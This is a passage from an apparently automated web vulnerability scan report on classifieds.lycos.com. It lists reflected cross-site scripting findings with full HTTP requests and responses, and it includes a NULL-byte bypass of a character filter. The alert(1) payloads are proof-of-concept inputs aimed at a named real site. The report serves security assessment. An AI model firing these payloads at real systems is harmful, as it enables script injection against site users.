Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:03:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:29 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Fpet%2Fdog; path=/
Set-Cookie: classifieds[lastpage][0][name]=Dogs; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/healthy-english-bulldog-puppies-2416171752?b055e"><script>alert(1)</script>edd94c248b7=1&mobile=1" rel="nofollow">
...[SNIP]...

1.144. http://classifieds.lycos.com/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a3fe"><script>alert(1)</script>ad8ae194ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog8a3fe"><script>alert(1)</script>ad8ae194ef/waiting-for-new-alaskan-malamute-puppies-2416164302 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog8a3fe"><script>alert(1)</script>ad8ae194ef/waiting-for-new-alaskan-malamute-puppies-2416164302?mobile=1" rel="nofollow">
...[SNIP]...

1.145. http://classifieds.lycos.com/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004ebf0"><script>alert(1)</script>a2eb223d25 was submitted in the REST URL parameter 2. This input was echoed as 4ebf0"><script>alert(1)</script>a2eb223d25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302%004ebf0"><script>alert(1)</script>a2eb223d25 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:24 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302%004ebf0"><script>alert(1)</script>a2eb223d25?mobile=1" rel="nofollow">
...[SNIP]...

1.146. http://classifieds.lycos.com/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa6ca"><script>alert(1)</script>0c908744318 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302?aa6ca"><script>alert(1)</script>0c908744318=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:03:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:38 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Fpet%2Fdog; path=/
Set-Cookie: classifieds[lastpage][0][name]=Dogs; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302?aa6ca"><script>alert(1)</script>0c908744318=1&mobile=1" rel="nofollow">
...[SNIP]...

1.147. http://classifieds.lycos.com/sale-pet-fish/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-fish/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0144"><script>alert(1)</script>d312a9b0273 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-fishc0144"><script>alert(1)</script>d312a9b0273/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:12:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:20 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-fishc0144"><script>alert(1)</script>d312a9b0273/?mobile=1" rel="nofollow">
...[SNIP]...

1.148. http://classifieds.lycos.com/sale-pet-fish/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-fish/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b85c7"><script>alert(1)</script>713d5e4757f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-fish/?b85c7"><script>alert(1)</script>713d5e4757f=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:51 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-fish/?b85c7"><script>alert(1)</script>713d5e4757f=1&mobile=1" rel="nofollow">
...[SNIP]...

1.149. http://classifieds.lycos.com/sale-pet-supply/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-supply/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3911c"><script>alert(1)</script>66ee9192fac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-supply3911c"><script>alert(1)</script>66ee9192fac/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:13:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:13:01 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-supply3911c"><script>alert(1)</script>66ee9192fac/?mobile=1" rel="nofollow">
...[SNIP]...

1.150. http://classifieds.lycos.com/sale-pet-supply/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet-supply/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a6f1"><script>alert(1)</script>cd8f68d27cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet-supply/?8a6f1"><script>alert(1)</script>cd8f68d27cb=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:12:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:23 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet-supply/?8a6f1"><script>alert(1)</script>cd8f68d27cb=1&mobile=1" rel="nofollow">
...[SNIP]...

1.151. http://classifieds.lycos.com/sale-pet/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71d65"><script>alert(1)</script>225a18cf5e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet71d65"><script>alert(1)</script>225a18cf5e2/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:00 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet71d65"><script>alert(1)</script>225a18cf5e2/?mobile=1" rel="nofollow">
...[SNIP]...

1.152. http://classifieds.lycos.com/sale-pet/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-pet/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 578d0"><script>alert(1)</script>75191efa096 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-pet/?578d0"><script>alert(1)</script>75191efa096=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-pet/?578d0"><script>alert(1)</script>75191efa096=1&mobile=1" rel="nofollow">
...[SNIP]...

1.153. http://classifieds.lycos.com/sale-sale-garage/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-sale-garage/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804d0"><script>alert(1)</script>d30bcf2ddf0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-sale-garage804d0"><script>alert(1)</script>d30bcf2ddf0/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-sale-garage804d0"><script>alert(1)</script>d30bcf2ddf0/?mobile=1" rel="nofollow">
...[SNIP]...

1.154. http://classifieds.lycos.com/sale-sale-garage/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-sale-garage/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ba75"><script>alert(1)</script>813bfeb0c7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-sale-garage/?8ba75"><script>alert(1)</script>813bfeb0c7f=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:25 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-sale-garage/?8ba75"><script>alert(1)</script>813bfeb0c7f=1&mobile=1" rel="nofollow">
...[SNIP]...

1.155. http://classifieds.lycos.com/sale-tickets-concert/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-concert/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae616"><script>alert(1)</script>b08377a555c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-concertae616"><script>alert(1)</script>b08377a555c/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:36 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-concertae616"><script>alert(1)</script>b08377a555c/?mobile=1" rel="nofollow">
...[SNIP]...

1.156. http://classifieds.lycos.com/sale-tickets-concert/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-concert/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c465c"><script>alert(1)</script>687d071c269 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-concert/?c465c"><script>alert(1)</script>687d071c269=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:49 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-concert/?c465c"><script>alert(1)</script>687d071c269=1&mobile=1" rel="nofollow">
...[SNIP]...

1.157. http://classifieds.lycos.com/sale-tickets-group-class_workshop/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-group-class_workshop/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ac20"><script>alert(1)</script>238d92d6570 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-group-class_workshop9ac20"><script>alert(1)</script>238d92d6570/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:23 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-group-class_workshop9ac20"><script>alert(1)</script>238d92d6570/?mobile=1" rel="nofollow">
...[SNIP]...

